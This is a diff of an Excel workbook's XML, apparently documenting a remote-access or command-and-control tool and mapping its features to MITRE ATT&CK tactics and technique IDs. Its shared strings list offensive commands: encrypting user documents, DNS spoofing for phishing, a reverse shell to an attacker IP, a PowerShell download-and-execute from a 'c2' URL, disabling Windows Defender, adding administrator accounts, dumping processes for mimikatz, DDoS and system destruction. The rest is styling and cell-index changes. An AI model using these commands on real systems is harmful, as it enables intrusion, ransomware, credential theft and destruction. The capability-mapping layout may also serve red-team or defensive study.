+    <t xml:space="preserve"> !encrypt|Q4dsd87rn1AE5@54fDER4584S2dZFj|C:\users\      Param 2 MUST ALWAYS END WITH "\"    - encrypt all "doc,docx,xlx,xlsx,ppt,pptx,jpg,png,bmp,pdf,txt,log,mp3,avi,mpeg,mp4" files</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !dnsspoof|127.0.0.1  facebook.com|0/1  --&gt; 1 =&gt; add, 0 =&gt; clean &amp; add</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !destroy the system</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !sendmail|target@corp.com|subject|Hello Im your friend|c:\evil.pdf    -  Send email from the compromised system</t>
+  </si>
+  <si>
+    <t>!runas|IEX(New-Object Net.WebClient).DownloadString("http://c2/link/pnt.ps1"))</t>
+  </si>
+  <si>
+    <t>!procdump    -  dump process - usefull to use offline mimikatz</t>
+  </si>
+  <si>
+    <t>!http|8080  -  setup local http server and host a page (Efficient if used with DNSSPOOF: you setup phishing page and you host redir.html To redirect local victim to your phishing page</t>
+  </si>
+  <si>
+    <t>!phish|facebook.com|http://xxxxx.ngrok.io/facebook</t>
+  </si>
+  <si>
+    <t>!reverseshell|attackerIP|AttackerPort</t>
+  </si>
+  <si>
+    <t>!httprat|212.74.21.23  OR  !httprat|xxxxxx.ngrok.io   (without HTTP/s)</t>
+  </si>
+  <si>
+    <t>!checkwmi  --  Verify WMI value</t>
+  </si>
+  <si>
+    <t>!streaming|on / off - take screenshot at every hello (active spy)</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !choco  - install Choco and some usefull plug</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !pshupgrade  --  upgrade powershell version</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !windefkill   OR !windefkill|10.10.10.2   -  Kill Windows Defender locally or remotely</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !hotpotatoes|net user tater Winter2016 /add &amp;&amp; net localgroup administrators tater /add</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> !adduser|johndoe|p@s5w0rd|domain</t>
+  </si>
+  <si>
+    <t>!downexec|ps1/exe|http://url.com/file|file -  example !downexec|ps1|http://script.com/Invoke-DBC2.ps1 |Invoke-DBC2 -Arguments    OR !downexec|exe|http://script.com/bin.exe |-i user -c pc</t>
+  </si>
+  <si>
+    <t xml:space="preserve">!ddos          </t>
+  </si>
+  <si>
+    <t xml:space="preserve">!destroy </t>
+  </si>
+  <si>
+    <t xml:space="preserve">!backdoorlnk </t>
+  </si>
+  <si>
+    <t>!firewall|on / off|8080   - Desactivate or activate firewall and also specify a port to open in and out</t>
+  </si>
+  <si>
+    <t>!!smbenum|toto|F8580EAGFH89725  -Enumarate Group,Sessions,Users,shares, need HASH</t>
+  </si>
+  <si>
+    <t>!enumsession|toto|F8580EAGFH89725 - Enumarate sessions, need HASH</t>
+  </si>
+  <si>
+    <t xml:space="preserve">!explorer|1|  &gt;only list share -   !explorer|0|C:\users  &gt;only list specified local folder  -  !explorer|1|C:\users  &gt;list shares and specified local folder </t>
+  </si>
+  <si>
+    <t>Reconnaissance</t>
+  </si>
+  <si>
+    <t>Initial Access</t>
+  </si>
+  <si>
+    <t>The adversary is trying to gather information they can use to plan future operations.</t>
+  </si>
+  <si>
+    <t>Resource Development</t>
+  </si>
+  <si>
+    <t>The adversary is trying to establish resources they can use to support operations.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to get into your network.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to run malicious code.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to maintain their foothold.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to gain higher-level permissions.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to avoid being detected.</t>
+  </si>
+  <si>
+    <t>Credential Access</t>
+  </si>
+  <si>
+    <t>The adversary is trying to steal account names and passwords.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to figure out your environment.</t>
+  </si>
+  <si>
+    <t>Lateral Movement</t>
+  </si>
+  <si>
+    <t>The adversary is trying to move through your environment.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to gather data of interest to their goal.</t>
+  </si>
+  <si>
+    <t>Command and Control</t>
+  </si>
+  <si>
+    <t>The adversary is trying to communicate with compromised systems to control them.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to steal data.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to manipulate, interrupt, or destroy your systems and data.</t>
+  </si>
+  <si>
+    <t>T1090.001</t>
+  </si>
+  <si>
+    <t>T1090</t>
+  </si>
+  <si>
+    <t>T1071</t>
+  </si>
+  <si>
+    <t>T1102</t>
+  </si>
+  <si>
+    <t>T1219</t>
+  </si>
+  <si>
+    <t>T1071.001</t>
+  </si>
+  <si>
+    <t>T1557.0001</t>
+  </si>
+  <si>
+    <t>T1003</t>
+  </si>
+  <si>
+    <t>T1555</t>
+  </si>
+  <si>
+    <t>!backdoorlnk drop lnk backdoor</t>
+  </si>
+  <si>
+    <t>!smbenum|toto|F8580EAGFH89725  -Enumarate Group,Sessions,Users,shares, need HASH</t>
   </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
 <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
-  <fonts count="6" x14ac:knownFonts="1">
+  <fonts count="5" x14ac:knownFonts="1">
     <font>
       <sz val="11"/>
       <color theme="1"/>
@@ -1276,22 +1433,13 @@
       <family val="2"/>
     </font>
     <font>
-      <sz val="11"/>
-      <color rgb="FFFF0000"/>
-      <name val="Calibri"/>
+      <sz val="12"/>
+      <color rgb="FF212529"/>
+      <name val="Arial"/>
       <family val="2"/>
-      <scheme val="minor"/>
-    </font>
-    <font>
-      <b/>
-      <sz val="11"/>
-      <color rgb="FFFF0000"/>
-      <name val="Calibri"/>
-      <family val="2"/>
-      <scheme val="minor"/>
     </font>
   </fonts>
-  <fills count="4">
+  <fills count="5">
     <fill>
       <patternFill patternType="none"/>
     </fill>
@@ -1310,8 +1458,14 @@
         <bgColor indexed="64"/>
       </patternFill>
     </fill>
+    <fill>
+      <patternFill patternType="solid">
+        <fgColor rgb="FFF2F2F2"/>
+        <bgColor indexed="64"/>
+      </patternFill>
+    </fill>
   </fills>
-  <borders count="4">
+  <borders count="5">
     <border>
       <left/>
       <right/>
@@ -1348,11 +1502,26 @@
       <bottom/>
       <diagonal/>
     </border>
+    <border>
+      <left style="medium">
+        <color rgb="FFDFDFDF"/>
+      </left>
+      <right style="medium">
+        <color rgb="FFDFDFDF"/>
+      </right>
+      <top style="medium">
+        <color rgb="FFDFDFDF"/>
+      </top>
+      <bottom style="medium">
+        <color rgb="FFDFDFDF"/>
+      </bottom>
+      <diagonal/>
+    </border>
   </borders>
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="11">
+  <cellXfs count="13">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" wrapText="1"/>
@@ -1374,6 +1543,10 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" wrapText="1"/>
     </xf>
+    <xf numFmtId="0" fontId="4" fillId="4" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="top" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
@@ -2431,41 +2604,44 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
-  <sheetPr codeName="Feuil1" filterMode="1"/>
-  <dimension ref="A1:U103"/>
+  <sheetPr codeName="Feuil1"/>
+  <dimension ref="A1:V111"/>
   <sheetViews>
     <sheetView tabSelected="1" zoomScale="80" zoomScaleNormal="80" workbookViewId="0">
-      <selection activeCell="D99" sqref="D99"/>
+      <selection activeCell="F1" sqref="F1:F1048576"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
   <cols>
     <col min="1" max="1" width="4.42578125" bestFit="1" customWidth="1"/>
-    <col min="2" max="2" width="20.5703125" bestFit="1" customWidth="1"/>
-    <col min="3" max="3" width="20" style="1" customWidth="1"/>
-    <col min="4" max="4" width="11.7109375" style="6" customWidth="1"/>
-    <col min="5" max="5" width="93.7109375" customWidth="1"/>
-    <col min="10" max="10" width="11.42578125" customWidth="1"/>
-    <col min="11" max="11" width="11.85546875" customWidth="1"/>
-    <col min="16" max="16" width="53.5703125" customWidth="1"/>
-    <col min="17" max="17" width="19.140625" customWidth="1"/>
-    <col min="21" max="21" width="12.85546875" customWidth="1"/>
+    <col min="2" max="2" width="31.28515625" bestFit="1" customWidth="1"/>
+    <col min="3" max="3" width="20.5703125" bestFit="1" customWidth="1"/>
+    <col min="4" max="4" width="20" style="1" customWidth="1"/>
+    <col min="5" max="5" width="11.7109375" style="6" customWidth="1"/>
+    <col min="6" max="6" width="152.28515625" customWidth="1"/>
+    <col min="11" max="11" width="11.42578125" customWidth="1"/>
+    <col min="12" max="12" width="11.85546875" customWidth="1"/>
+    <col min="17" max="17" width="53.5703125" customWidth="1"/>
+    <col min="18" max="18" width="19.140625" customWidth="1"/>
+    <col min="22" max="22" width="12.85546875" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:21" s="4" customFormat="1" ht="15.75" x14ac:dyDescent="0.25">
+    <row r="1" spans="1:22" s="4" customFormat="1" ht="15.75" x14ac:dyDescent="0.25">
       <c r="B1" s="2" t="s">
-        <v>36</v>
-      </c>
-      <c r="C1" s="3" t="s">
-        <v>211</v>
-      </c>
-      <c r="D1" s="5" t="s">
-        <v>55</v>
-      </c>
-      <c r="E1" s="7" t="s">
-        <v>60</v>
-      </c>
-      <c r="F1" s="2"/>
+        <v>187</v>
+      </c>
+      <c r="C1" s="2" t="s">
+        <v>2</v>
+      </c>
+      <c r="D1" s="3" t="s">
+        <v>146</v>
+      </c>
+      <c r="E1" s="5" t="s">
+        <v>21</v>
+      </c>
+      <c r="F1" s="7" t="s">
+        <v>26</v>
+      </c>
       <c r="G1" s="2"/>
       <c r="H1" s="2"/>
       <c r="I1" s="2"/>
@@ -2476,2013 +2652,2292 @@
       <c r="N1" s="2"/>
       <c r="O1" s="2"/>
       <c r="P1" s="2"/>
-    </row>
-    <row r="2" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+      <c r="Q1" s="2"/>
+    </row>
+    <row r="2" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A2">
         <v>1</v>
       </c>
-      <c r="B2" t="s">
-        <v>73</v>
-      </c>
-      <c r="C2" s="1" t="s">
-        <v>210</v>
-      </c>
-      <c r="E2" t="s">
-        <v>0</v>
-      </c>
-    </row>
-    <row r="3" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C2" t="s">
+        <v>35</v>
+      </c>
+      <c r="D2" s="1" t="s">
+        <v>145</v>
+      </c>
+      <c r="F2" t="s">
+        <v>241</v>
+      </c>
+    </row>
+    <row r="3" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A3">
         <v>2</v>
       </c>
-      <c r="B3" t="s">
-        <v>73</v>
-      </c>
-      <c r="C3" s="1" t="s">
-        <v>209</v>
-      </c>
-      <c r="D3" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E3" t="s">
-        <v>255</v>
-      </c>
-    </row>
-    <row r="4" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C3" t="s">
+        <v>35</v>
+      </c>
+      <c r="D3" s="1" t="s">
+        <v>144</v>
+      </c>
+      <c r="E3" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F3" t="s">
+        <v>242</v>
+      </c>
+    </row>
+    <row r="4" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A4">
         <v>3</v>
       </c>
-      <c r="B4" t="s">
-        <v>73</v>
-      </c>
-      <c r="C4" s="1" t="s">
-        <v>208</v>
-      </c>
-      <c r="D4" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E4" t="s">
-        <v>256</v>
-      </c>
-      <c r="Q4" t="s">
-        <v>61</v>
-      </c>
-      <c r="U4" t="s">
-        <v>37</v>
-      </c>
-    </row>
-    <row r="5" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C4" t="s">
+        <v>35</v>
+      </c>
+      <c r="D4" s="1" t="s">
+        <v>143</v>
+      </c>
+      <c r="E4" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F4" t="s">
+        <v>243</v>
+      </c>
+      <c r="R4" t="s">
+        <v>315</v>
+      </c>
+      <c r="V4" t="s">
+        <v>3</v>
+      </c>
+    </row>
+    <row r="5" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A5">
         <v>4</v>
       </c>
       <c r="B5" t="s">
-        <v>70</v>
-      </c>
-      <c r="C5" s="1" t="s">
-        <v>207</v>
-      </c>
-      <c r="D5" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E5" t="s">
-        <v>20</v>
-      </c>
-      <c r="Q5" t="s">
-        <v>62</v>
+        <v>340</v>
+      </c>
+      <c r="C5" t="s">
+        <v>331</v>
+      </c>
+      <c r="D5" s="1" t="s">
+        <v>142</v>
+      </c>
+      <c r="E5" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F5" t="s">
+        <v>275</v>
       </c>
       <c r="R5" t="s">
-        <v>38</v>
+        <v>316</v>
       </c>
       <c r="S5" t="s">
-        <v>58</v>
-      </c>
-      <c r="U5" t="s">
-        <v>39</v>
-      </c>
-    </row>
-    <row r="6" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+        <v>4</v>
+      </c>
+      <c r="T5" t="s">
+        <v>24</v>
+      </c>
+      <c r="V5" t="s">
+        <v>5</v>
+      </c>
+    </row>
+    <row r="6" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A6">
         <v>5</v>
       </c>
-      <c r="B6" t="s">
-        <v>74</v>
-      </c>
-      <c r="C6" s="1" t="s">
-        <v>206</v>
-      </c>
-      <c r="D6" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E6" t="s">
-        <v>1</v>
-      </c>
-      <c r="Q6" t="s">
-        <v>75</v>
-      </c>
-      <c r="S6" t="s">
-        <v>56</v>
-      </c>
-      <c r="U6" t="s">
-        <v>40</v>
-      </c>
-    </row>
-    <row r="7" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C6" t="s">
+        <v>208</v>
+      </c>
+      <c r="D6" s="1" t="s">
+        <v>141</v>
+      </c>
+      <c r="E6" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F6" t="s">
+        <v>244</v>
+      </c>
+      <c r="R6" t="s">
+        <v>27</v>
+      </c>
+      <c r="T6" t="s">
+        <v>22</v>
+      </c>
+      <c r="V6" t="s">
+        <v>6</v>
+      </c>
+    </row>
+    <row r="7" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A7">
         <v>6</v>
       </c>
-      <c r="B7" t="s">
-        <v>65</v>
-      </c>
-      <c r="C7" s="1" t="s">
-        <v>205</v>
-      </c>
-      <c r="D7" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E7" t="s">
-        <v>251</v>
-      </c>
-      <c r="Q7" t="s">
-        <v>63</v>
-      </c>
-      <c r="S7" t="s">
-        <v>57</v>
-      </c>
-      <c r="U7" t="s">
-        <v>41</v>
-      </c>
-    </row>
-    <row r="8" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C7" t="s">
+        <v>30</v>
+      </c>
+      <c r="D7" s="1" t="s">
+        <v>140</v>
+      </c>
+      <c r="E7" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F7" t="s">
+        <v>173</v>
+      </c>
+      <c r="G7" t="s">
+        <v>217</v>
+      </c>
+      <c r="R7" t="s">
+        <v>36</v>
+      </c>
+      <c r="T7" t="s">
+        <v>23</v>
+      </c>
+      <c r="V7" t="s">
+        <v>7</v>
+      </c>
+    </row>
+    <row r="8" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A8">
         <v>7</v>
       </c>
-      <c r="B8" t="s">
-        <v>73</v>
-      </c>
-      <c r="C8" s="1" t="s">
-        <v>204</v>
-      </c>
-      <c r="E8" t="s">
-        <v>22</v>
-      </c>
-      <c r="Q8" t="s">
-        <v>64</v>
-      </c>
-      <c r="S8" t="s">
+      <c r="C8" t="s">
+        <v>35</v>
+      </c>
+      <c r="D8" s="1" t="s">
         <v>139</v>
       </c>
-      <c r="U8" t="s">
-        <v>43</v>
-      </c>
-    </row>
-    <row r="9" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+      <c r="F8" t="s">
+        <v>276</v>
+      </c>
+      <c r="R8" t="s">
+        <v>28</v>
+      </c>
+      <c r="T8" t="s">
+        <v>82</v>
+      </c>
+      <c r="V8" t="s">
+        <v>9</v>
+      </c>
+    </row>
+    <row r="9" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A9">
         <v>8</v>
       </c>
       <c r="B9" t="s">
-        <v>69</v>
-      </c>
-      <c r="C9" s="1" t="s">
-        <v>203</v>
-      </c>
-      <c r="D9" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E9" t="s">
-        <v>77</v>
-      </c>
-      <c r="Q9" t="s">
-        <v>65</v>
+        <v>207</v>
+      </c>
+      <c r="C9" t="s">
+        <v>34</v>
+      </c>
+      <c r="D9" s="1" t="s">
+        <v>138</v>
+      </c>
+      <c r="E9" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F9" t="s">
+        <v>267</v>
       </c>
       <c r="R9" t="s">
-        <v>42</v>
-      </c>
-      <c r="U9" t="s">
-        <v>44</v>
-      </c>
-    </row>
-    <row r="10" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+        <v>325</v>
+      </c>
+      <c r="S9" t="s">
+        <v>8</v>
+      </c>
+      <c r="V9" t="s">
+        <v>10</v>
+      </c>
+    </row>
+    <row r="10" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A10">
         <v>9</v>
       </c>
       <c r="B10" t="s">
-        <v>69</v>
-      </c>
-      <c r="C10" s="1" t="s">
-        <v>202</v>
-      </c>
-      <c r="D10" s="6" t="s">
-        <v>57</v>
-      </c>
-      <c r="E10" t="s">
-        <v>19</v>
+        <v>205</v>
+      </c>
+      <c r="C10" t="s">
+        <v>33</v>
+      </c>
+      <c r="D10" s="1" t="s">
+        <v>137</v>
+      </c>
+      <c r="E10" s="6" t="s">
+        <v>23</v>
       </c>
       <c r="F10" t="s">
-        <v>265</v>
-      </c>
-      <c r="Q10" t="s">
-        <v>66</v>
-      </c>
-      <c r="U10" t="s">
-        <v>45</v>
-      </c>
-    </row>
-    <row r="11" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+        <v>268</v>
+      </c>
+      <c r="G10" t="s">
+        <v>180</v>
+      </c>
+      <c r="R10" t="s">
+        <v>30</v>
+      </c>
+      <c r="V10" t="s">
+        <v>11</v>
+      </c>
+    </row>
+    <row r="11" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A11">
         <v>10</v>
       </c>
       <c r="B11" t="s">
-        <v>69</v>
-      </c>
-      <c r="C11" s="1" t="s">
-        <v>201</v>
-      </c>
-      <c r="D11" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E11" t="s">
-        <v>76</v>
-      </c>
-      <c r="Q11" t="s">
-        <v>67</v>
-      </c>
-      <c r="U11" t="s">
-        <v>46</v>
-      </c>
-    </row>
-    <row r="12" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+        <v>207</v>
+      </c>
+      <c r="C11" t="s">
+        <v>34</v>
+      </c>
+      <c r="D11" s="1" t="s">
+        <v>136</v>
+      </c>
+      <c r="E11" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F11" t="s">
+        <v>277</v>
+      </c>
+      <c r="R11" t="s">
+        <v>328</v>
+      </c>
+      <c r="V11" t="s">
+        <v>12</v>
+      </c>
+    </row>
+    <row r="12" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A12">
         <v>11</v>
       </c>
       <c r="B12" t="s">
-        <v>68</v>
-      </c>
-      <c r="C12" s="1" t="s">
-        <v>200</v>
-      </c>
-      <c r="E12" t="s">
-        <v>2</v>
-      </c>
-      <c r="Q12" t="s">
-        <v>68</v>
-      </c>
-      <c r="U12" t="s">
-        <v>47</v>
-      </c>
-    </row>
-    <row r="13" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+        <v>204</v>
+      </c>
+      <c r="C12" t="s">
+        <v>33</v>
+      </c>
+      <c r="D12" s="1" t="s">
+        <v>135</v>
+      </c>
+      <c r="E12" s="6" t="s">
+        <v>22</v>
+      </c>
+      <c r="F12" t="s">
+        <v>269</v>
+      </c>
+      <c r="R12" t="s">
+        <v>32</v>
+      </c>
+      <c r="V12" t="s">
+        <v>13</v>
+      </c>
+    </row>
+    <row r="13" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A13">
         <v>12</v>
       </c>
-      <c r="B13" t="s">
-        <v>67</v>
-      </c>
-      <c r="C13" s="1" t="s">
-        <v>199</v>
-      </c>
-      <c r="D13" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E13" t="s">
-        <v>240</v>
-      </c>
-      <c r="Q13" t="s">
-        <v>69</v>
-      </c>
-      <c r="U13" t="s">
-        <v>48</v>
-      </c>
-    </row>
-    <row r="14" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C13" t="s">
+        <v>32</v>
+      </c>
+      <c r="D13" s="1" t="s">
+        <v>134</v>
+      </c>
+      <c r="E13" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F13" t="s">
+        <v>245</v>
+      </c>
+      <c r="R13" t="s">
+        <v>33</v>
+      </c>
+      <c r="V13" t="s">
+        <v>14</v>
+      </c>
+    </row>
+    <row r="14" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A14">
         <v>13</v>
       </c>
-      <c r="B14" t="s">
-        <v>67</v>
-      </c>
-      <c r="C14" s="1" t="s">
-        <v>198</v>
-      </c>
-      <c r="E14" t="s">
-        <v>241</v>
-      </c>
-      <c r="Q14" t="s">
-        <v>70</v>
-      </c>
-      <c r="U14" t="s">
-        <v>49</v>
-      </c>
-    </row>
-    <row r="15" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C14" t="s">
+        <v>32</v>
+      </c>
+      <c r="D14" s="1" t="s">
+        <v>133</v>
+      </c>
+      <c r="F14" t="s">
+        <v>307</v>
+      </c>
+      <c r="R14" t="s">
+        <v>34</v>
+      </c>
+      <c r="V14" t="s">
+        <v>15</v>
+      </c>
+    </row>
+    <row r="15" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A15">
         <v>14</v>
       </c>
-      <c r="B15" t="s">
-        <v>71</v>
-      </c>
-      <c r="C15" s="1" t="s">
-        <v>197</v>
-      </c>
-      <c r="D15" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E15" t="s">
-        <v>3</v>
-      </c>
-      <c r="Q15" t="s">
-        <v>71</v>
-      </c>
-      <c r="U15" t="s">
-        <v>50</v>
-      </c>
-    </row>
-    <row r="16" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C15" t="s">
+        <v>32</v>
+      </c>
+      <c r="D15" s="1" t="s">
+        <v>132</v>
+      </c>
+      <c r="E15" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F15" t="s">
+        <v>246</v>
+      </c>
+      <c r="R15" t="s">
+        <v>331</v>
+      </c>
+      <c r="V15" t="s">
+        <v>16</v>
+      </c>
+    </row>
+    <row r="16" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A16">
         <v>15</v>
       </c>
-      <c r="B16" t="s">
-        <v>74</v>
-      </c>
-      <c r="C16" s="1" t="s">
-        <v>196</v>
-      </c>
-      <c r="E16" t="s">
-        <v>215</v>
-      </c>
-      <c r="Q16" t="s">
-        <v>72</v>
-      </c>
-      <c r="U16" t="s">
-        <v>51</v>
-      </c>
-    </row>
-    <row r="17" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C16" t="s">
+        <v>208</v>
+      </c>
+      <c r="D16" s="1" t="s">
+        <v>131</v>
+      </c>
+      <c r="F16" t="s">
+        <v>278</v>
+      </c>
+      <c r="R16" t="s">
+        <v>35</v>
+      </c>
+      <c r="V16" t="s">
+        <v>17</v>
+      </c>
+    </row>
+    <row r="17" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A17">
         <v>16</v>
       </c>
-      <c r="B17" t="s">
-        <v>67</v>
-      </c>
-      <c r="C17" s="1" t="s">
-        <v>195</v>
-      </c>
-      <c r="D17" s="6" t="s">
-        <v>139</v>
-      </c>
-      <c r="E17" t="s">
-        <v>4</v>
-      </c>
-      <c r="Q17" t="s">
-        <v>73</v>
-      </c>
-      <c r="U17" t="s">
-        <v>52</v>
-      </c>
-    </row>
-    <row r="18" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C17" t="s">
+        <v>32</v>
+      </c>
+      <c r="D17" s="1" t="s">
+        <v>130</v>
+      </c>
+      <c r="E17" s="6" t="s">
+        <v>82</v>
+      </c>
+      <c r="F17" t="s">
+        <v>247</v>
+      </c>
+      <c r="R17" t="s">
+        <v>208</v>
+      </c>
+      <c r="V17" t="s">
+        <v>18</v>
+      </c>
+    </row>
+    <row r="18" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A18">
         <v>17</v>
       </c>
-      <c r="B18" t="s">
-        <v>73</v>
-      </c>
-      <c r="C18" s="1" t="s">
-        <v>194</v>
-      </c>
-      <c r="D18" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E18" t="s">
-        <v>78</v>
-      </c>
-      <c r="Q18" t="s">
-        <v>74</v>
-      </c>
-      <c r="U18" t="s">
-        <v>53</v>
-      </c>
-    </row>
-    <row r="19" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C18" t="s">
+        <v>35</v>
+      </c>
+      <c r="D18" s="1" t="s">
+        <v>129</v>
+      </c>
+      <c r="E18" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F18" t="s">
+        <v>248</v>
+      </c>
+      <c r="V18" t="s">
+        <v>19</v>
+      </c>
+    </row>
+    <row r="19" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A19">
         <v>18</v>
       </c>
-      <c r="B19" t="s">
-        <v>74</v>
-      </c>
-      <c r="C19" s="1" t="s">
-        <v>100</v>
-      </c>
-      <c r="D19" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E19" t="s">
-        <v>99</v>
-      </c>
-      <c r="U19" t="s">
-        <v>54</v>
-      </c>
-    </row>
-    <row r="20" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C19" t="s">
+        <v>208</v>
+      </c>
+      <c r="D19" s="1" t="s">
+        <v>49</v>
+      </c>
+      <c r="E19" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F19" t="s">
+        <v>279</v>
+      </c>
+      <c r="V19" t="s">
+        <v>20</v>
+      </c>
+    </row>
+    <row r="20" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A20">
         <v>19</v>
       </c>
-      <c r="B20" t="s">
-        <v>73</v>
-      </c>
-      <c r="C20" s="1" t="s">
-        <v>193</v>
-      </c>
-      <c r="D20" s="6" t="s">
-        <v>58</v>
-      </c>
-      <c r="E20" t="s">
-        <v>5</v>
-      </c>
-    </row>
-    <row r="21" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+      <c r="C20" t="s">
+        <v>35</v>
+      </c>
+      <c r="D20" s="1" t="s">
+        <v>128</v>
+      </c>
+      <c r="E20" s="6" t="s">
+        <v>24</v>
+      </c>
+      <c r="F20" t="s">
+        <v>249</v>
+      </c>
+    </row>
+    <row r="21" spans="1:22" x14ac:dyDescent="0.25">
       <c r="A21">
         <v>20</v>
       </c>
       <c r="B21" t="s">
-        <v>65</v>
-      </c>
-      <c r="C21" s="1" t="s">
-        <v>220</v>
-      </c>
-      <c r="D21" s="6" t="s">
-        <v>57</v>
-      </c>
-      <c r="E21" t="s">
-        <v>223</v>
-      </c>
-    </row>
